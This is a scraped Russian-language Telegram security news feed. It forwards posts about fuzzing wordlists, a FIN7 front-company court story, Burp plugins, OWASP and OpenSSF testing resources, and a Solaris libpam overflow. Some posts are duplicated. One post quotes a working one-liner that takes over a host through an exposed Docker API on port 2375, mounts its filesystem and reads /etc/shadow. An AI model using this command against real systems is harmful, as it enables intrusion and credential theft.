Forwarded from Xymfrx
Assetnote делятся своими словарями для перебора и сообщают, что будут обновлять их каждый месяц. Помимо автоматически сгенерированных, на сайте есть словари сгенерированные с помощью Google BigQuery. Очень классно!
https://wordlists.assetnote.io
https://wordlists.assetnote.io
Twitter
shubs
Good wordlists are so important when discovering content on an asset. At @assetnote, we've built a wordlists site that updates itself on a monthly basis. For added value, we've included some of our best wordlists that we've manually collected too. https:…
Forwarded from SecAtor
Смешная история, наверняка многие уже в курсе.
Вчера в группе DEFCON Russia в Телегаме нарисовался пользователь под ником Maxim Zhukov, который разыскивал эксперта по инфосеку, чтобы тот смог выступить на его стороне (защиты) в судебном заседании. Поскольку товарища обвиняют в преступлении по ст. 273 УК РФ (Создание вредоносных программ), а все назначенные судом эксперты - редиски.
Дело в том, что он не виноват, просто больше 3 лет работал по найму на некую команду, которая, как он думал, была Red Team (пентестеры), а оказалось, что совсем даже наоборот, хакеры. И он все осознал только когда в 2018 году к нему пришли из ФСБ и стали его крепить.
В ходе обсуждения народ пришел к выводу, что топикстартер работал на компанию Combi Security, которая являлась прикрышкой для коммерческой хакерской группы FIN7 - эта история описана здесь. Что Maxim Zhukov и подтвердил, указав, что патчил Метасплойт (фреймворк для создания и отладки эксплойтов, используется как пентестерами, так и хакерами), чтобы он корректно работал с русскоязычной кодировкой. Чтобы в этом случае даже не подозревать чем ты занимаешься, надо быть очень сильно близоруким человеком.
Лучший комментарий в обсуждении - "Да кодеры не особо сведущие по части иб бывают. Помню вот был один, так он ботнет писал сам того не ведая".
Ссылку на группу не даем, но она открытая и находится ровно 1 (одним) запросом Гугла.
Вчера в группе DEFCON Russia в Телегаме нарисовался пользователь под ником Maxim Zhukov, который разыскивал эксперта по инфосеку, чтобы тот смог выступить на его стороне (защиты) в судебном заседании. Поскольку товарища обвиняют в преступлении по ст. 273 УК РФ (Создание вредоносных программ), а все назначенные судом эксперты - редиски.
Дело в том, что он не виноват, просто больше 3 лет работал по найму на некую команду, которая, как он думал, была Red Team (пентестеры), а оказалось, что совсем даже наоборот, хакеры. И он все осознал только когда в 2018 году к нему пришли из ФСБ и стали его крепить.
В ходе обсуждения народ пришел к выводу, что топикстартер работал на компанию Combi Security, которая являлась прикрышкой для коммерческой хакерской группы FIN7 - эта история описана здесь. Что Maxim Zhukov и подтвердил, указав, что патчил Метасплойт (фреймворк для создания и отладки эксплойтов, используется как пентестерами, так и хакерами), чтобы он корректно работал с русскоязычной кодировкой. Чтобы в этом случае даже не подозревать чем ты занимаешься, надо быть очень сильно близоруким человеком.
Лучший комментарий в обсуждении - "Да кодеры не особо сведущие по части иб бывают. Помню вот был один, так он ботнет писал сам того не ведая".
Ссылку на группу не даем, но она открытая и находится ровно 1 (одним) запросом Гугла.
The Bell
РБК: «русских хакеров» для взломов в США искали на российских сайтах вакансий
РБК выяснил, что хакерская группировка FIN7, причастная ко взломам более 100 американских компаний и хищению данных 15 млн банковских карт, искала сотрудников через легальные российские сайты вакансий и компании-ширмы. Одна из них — Combi Security — уже рассекречена…
Реально хорошая подборка получилась.
Ответ всем, кто спрашивал какие плагины я юзаю.
Ответ всем, кто спрашивал какие плагины я юзаю.
Forwarded from Cybershit
Ребята из Digital Security рассказали на Хабре о своем выборе плагинов для Burp Suite, которые они используют для повседневных задач.
https://habr.com/ru/company/dsec/blog/529088/
https://habr.com/ru/company/dsec/blog/529088/
Хабр
Burp и его друзья
В этой статье мы расскажем о полезных плагинах для Burp Suite Professional — инструмента для анализа веб-приложений. Плагинов много, и, чтобы помочь аудиторам сделать правильный выбор, мы составили...
Forwarded from Xymfrx
А вы, при тестировании веб-приложения, проверяете как оно отвечает с разных User-Agent'ов?
Если еще нет, то предлагаю почитать интересный write-up про уязвимости в инструментах, предназначенных для динамического отображения страниц веб-приложений.
Вкратце, такие инструменты обычно используются при настройке SEO, сайтов на JavaScript. Они нужны, чтобы отобразить контент страницы для поисковых роботов, которые не умеют в JS.
Если еще нет, то предлагаю почитать интересный write-up про уязвимости в инструментах, предназначенных для динамического отображения страниц веб-приложений.
Вкратце, такие инструменты обычно используются при настройке SEO, сайтов на JavaScript. Они нужны, чтобы отобразить контент страницы для поисковых роботов, которые не умеют в JS.
semgrep.dev
Semgrep App Security Platform | AI-assisted SAST, SCA and Secrets Detection
An extensible developer-friendly application security platform that scans source code to surface true and actionable security issues with AI-assisted SAST, SCA, and Secrets Detection solutions.
Forwarded from Xymfrx
Ого, вышлая новая версия OWASP Web Security Testing Guide!
https://github.com/OWASP/wstg/releases/tag/v4.2
https://github.com/OWASP/wstg/releases/tag/v4.2
GitHub
Release Release v4.2 · OWASP/wstg
Published here: https://owasp.org/www-project-web-security-testing-guide/v42/
- Guide:
- Add GraphQL API testing scenario and details (WSTG-APIT-01).
- Add Test Objectives to all scenarios.
-...
- Guide:
- Add GraphQL API testing scenario and details (WSTG-APIT-01).
- Add Test Objectives to all scenarios.
-...
Forwarded from Security Wine (бывший - DevSecOps Wine) (Denis Yakimov)
OpenSSF CVE Benchmark
День назад OpenSSF релизнули проект OpenSSF CVE Benchmark. Основная цель проекта - сравнивать инструменты SAST на реальных кодовых базах, в которых была найдена CVE до и после патча. По сути, это репо, содержащее скрипты, которые запускают на текущий момент ESLint, NodeJSScan и CodeQL против различных open-source проектов на GitHub. Ссылки, версии и уязвимость содержатся в JSON-файлах для каждой CVE (пока что только JavaScript и TypeScript). После запуска сканирования автоматически генерируется сравнение результатов в веб-морде с указанием на ложные срабатывания. В roadmap обещают больше тулов и CVE.
Похожий проект 4 года назад делала команда OWASP. Они написали 2740 test cases на Java и натравили на них различные инструменты SAST, в том числе туда попал DAST - OWASP ZAP. Среди SAST были и коммерческие инструменты. Запустить бенчмарки можно и сейчас на их репо. В отличие от OpenSSF бенчмарки от OWASP содержат непосредственно сам код, а не ссылку на репо.
#sast #dev
День назад OpenSSF релизнули проект OpenSSF CVE Benchmark. Основная цель проекта - сравнивать инструменты SAST на реальных кодовых базах, в которых была найдена CVE до и после патча. По сути, это репо, содержащее скрипты, которые запускают на текущий момент ESLint, NodeJSScan и CodeQL против различных open-source проектов на GitHub. Ссылки, версии и уязвимость содержатся в JSON-файлах для каждой CVE (пока что только JavaScript и TypeScript). После запуска сканирования автоматически генерируется сравнение результатов в веб-морде с указанием на ложные срабатывания. В roadmap обещают больше тулов и CVE.
Похожий проект 4 года назад делала команда OWASP. Они написали 2740 test cases на Java и натравили на них различные инструменты SAST, в том числе туда попал DAST - OWASP ZAP. Среди SAST были и коммерческие инструменты. Запустить бенчмарки можно и сейчас на их репо. В отличие от OpenSSF бенчмарки от OWASP содержат непосредственно сам код, а не ссылку на репо.
#sast #dev
💥Easy RCE using Docker API on port 2375/tcp
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
#ptswarmTechniques https://t.co/1NKzh1zYkS
https://twitter.com/ptswarm/status/1338477426276511749?s=09
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
#ptswarmTechniques https://t.co/1NKzh1zYkS
https://twitter.com/ptswarm/status/1338477426276511749?s=09
Twitter
PT SWARM
💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques
Forwarded from vulners
Solaris SunSSH 11.0 x86 - libpam Remote Root
A trivial to reach stack-based buffer overflow is present in libpam on
Solaris. The vulnerable code exists in pamframework.c parseusername() which allocates a fixed size buffer of 512 bytes on the stack and parses usernames into the buffer via modules (authtokget) without bounds checks. This issue can be reached remotely pre-authentication via SunSSH when "keyboard-interactive" is enabled to use PAM based authentication. The vulnerability was discovered being actively exploited by FireEye in the wild and is part of an APT toolkit called "EVILSUN".
Download Exploit
A trivial to reach stack-based buffer overflow is present in libpam on
Solaris. The vulnerable code exists in pamframework.c parseusername() which allocates a fixed size buffer of 512 bytes on the stack and parses usernames into the buffer via modules (authtokget) without bounds checks. This issue can be reached remotely pre-authentication via SunSSH when "keyboard-interactive" is enabled to use PAM based authentication. The vulnerability was discovered being actively exploited by FireEye in the wild and is part of an APT toolkit called "EVILSUN".
Download Exploit
Forwarded from Positive Events
Киберполигон бьет рекорды!🥇
The Standoff признан самым массовым соревнованием в области кибербезопасности по версии «Книги рекордов России».
The Standoff признан самым массовым соревнованием в области кибербезопасности по версии «Книги рекордов России».
SecurityLab.ru
The Standoff в «Книге рекордов России»!
245 человек приняли участие в самом массовом соревновании в области кибербезопасности по версии «Книги рекордов России».